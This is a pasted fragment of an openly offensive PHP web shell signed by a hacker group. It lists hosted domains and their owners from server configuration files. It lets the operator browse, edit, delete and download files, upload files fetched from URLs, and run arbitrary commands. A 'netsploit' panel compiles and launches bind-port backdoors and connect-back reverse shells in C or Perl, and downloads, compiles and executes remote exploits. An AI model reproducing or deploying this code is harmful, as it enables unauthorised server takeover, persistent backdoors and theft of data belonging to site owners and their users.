  1015.                 $path = "/home/$user/public_html/";
  1016.                 echo "<a href='?y&#61;$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br><br><br>";
  1017.                 }
  1018.         echo "\n";
  1019.         echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
  1020.         echo "[+] Complete...\n"."<br />";
  1021.         echo '<br><br></b>
  1022.         </body>
  1023.         </html>';
  1024.    
  1025.         }
  1026.   elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1027.         {      
  1028.         ?>
  1029.         <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1030.         <?php
  1031.  
  1032.         //radable public_html
  1033.        
  1034.         echo "<br><br>";
  1035.         $file = @implode(@file("/etc/named.conf"));
  1036.         if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1037.         preg_match_all("#named/(.*?).db#",$file ,$r);
  1038.         $domains = array_unique($r[1]);
  1039.        
  1040.         function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1041.                 check();
  1042.  
  1043.         echo "<table align=center border=1 width=59% cellpadding=5>
  1044.                  <tr><td colspan=2>[+] Jumlah Domain : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Di Server.</td></tr>
  1045.                  <tr><td><b>List Of Users</b></td><td><b><font style=color:#0015FF;List Of Domains</b></td></tr>";
  1046.                 foreach($domains as $domain)
  1047.                {
  1048.                $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1049.                echo "<tr><td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td><td>".$user['name']."</td></tr>";
  1050.                }
  1051.                 echo "</table>";
  1052.         //radable public_html
  1053.         }
  1054.  
  1055.  elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  1056.  if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php }
  1057.   elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; }
  1058.    elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  1059.     <?php }
  1060.     elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  1061.  
  1062.   elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  1063.  
  1064.   elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; }
  1065.  
  1066.   elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; }
  1067.  
  1068.   elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  1069.     <?php }elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?><div class="info">:: Modified Shell by <span class="gaya"><a href="https://www.facebook.com/braganza1105">Phthonos</a> ::</span></div><div class="jaya">  &copy; Phantom Hackers.PH #Phthonos</div>
  1070. </div> </body> </html>

Reply to "Untitled"

Here you can reply to the paste above